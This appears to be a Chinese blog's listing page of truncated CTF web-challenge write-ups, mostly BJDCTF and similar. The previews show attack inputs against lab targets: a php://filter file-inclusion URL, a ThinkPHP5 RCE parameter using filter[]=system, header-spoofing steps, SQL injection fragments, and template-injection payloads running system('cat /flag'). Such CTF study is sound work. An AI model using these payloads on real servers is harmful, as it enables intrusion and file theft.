[BJDCTF2020]EasySearch(1/100)
知识点 SSI注入的条件 当符合下列条件时,攻击者可以在 Web 服务器上运行任意命令: - Web 服务器已支持SSI(服务器端包含) - Web 应用程序未对对相关SSI关键字做过滤 - Web 应用程序在返回响应的HTML页面时,嵌入用户输入 漏洞参考文献 解题 扫描发现.swp文件 <?php ob_start(); function…
2021-1-12 15:04
|
510
|
|
207 字
|
3 分钟
[NCTF2019]Fake XML cookbook
从XML相关一步一步到XXE漏洞 查看题目源码,并且题目提示了XML,源码也给出了 function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || password == ""){ a…
2020-11-26 22:12
|
601
|
|
89 字
|
3 分钟
serialize和unserialize函数
一、serialize序列化函数 序列化是将变量转换为可保存或传输的字符串的过程 <?php $a = array('a' => 'Apple' ,'b' => 'banana' , 'c' => 'Coconut'); //序列化数组 $s = serialize($a); echo $s; //输出结果:a:3:{s:1…
2020-11-24 21:16
|
708
|
|
96 字
|
2 分钟
[BSidesCF 2020]Had a bad day
随便点一下 猜测sql注入,报错显示include(),是文件包含 http://d5fd4aa8-7ea1-4fc3-ae53-d3f1ea84d5d0.node3.buuoj.cn/index.php?category=php://filter/read=convert.base64-encode/resource=index 读取index …
2020-11-24 10:41
|
589
|
|
58 字
|
几秒读完
[BJDCTF 2nd]old-hack
构造参数报错http://79389e31-5ac2-43b0-a1ee-6a54ec8390a2.node3.buuoj.cn/?s=1 可以看到THINKPHP5的版本 直接百度构造参数_method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_…
2020-11-20 18:30
|
614
|
|
43 字
|
几秒读完
[BJDCTF 2nd]假猪套天下第一
打开是个登录界面除了admin,所有东西都能登录 尝试抓包,可以看到一个302的包,下面有个注释,尝试访问 进行访问,提示99年后开放 发现cookie上有个time,时间戳,把时间改成99年之后,提示用本机访问 构造请求头访问,提示需要来自gem-love.com 增加Referer:gem-love.com,提示必须在Commodo 64浏览器…
2020-11-17 20:27
|
775
|
|
210 字
|
1 分钟内
[BJDCTF2020]ZJCTF,不过如此
源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><…
2020-11-04 20:08
|
749
|
|
86 字
|
3 分钟
[BJDCTF2020]The mystery of ip
提示IP 猜测用XFF,伪造XFF头看看情况 用X-Forwarded-For: {{7*7}}有回显 构造payload: X-Forwarded-For: {{system("ls")}} X-Forwarded-For: {{system("cat /flag")}}
2020-10-30 19:34
|
973
|
|
31 字
|
几秒读完
[BJDCTF 2nd]简单注入
解题 访问robots.txt 访问hint.txt username处可以用\来转义单引号,password处使用sql语句整数型注入。 传入admin\和or/**/length(database())>0#会回显stronger字样 传入admin\和or/**/length(database())<0#会回显girl frien…
2020-5-12 14:00
|
1,733
|
|
104 字
|
3 分钟
[极客大挑战 2019]HardSQL
知识 updatexml()函数 updatexml (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第…
2020-5-12 10:59
|
1,630
|
|
239 字
|
2 分钟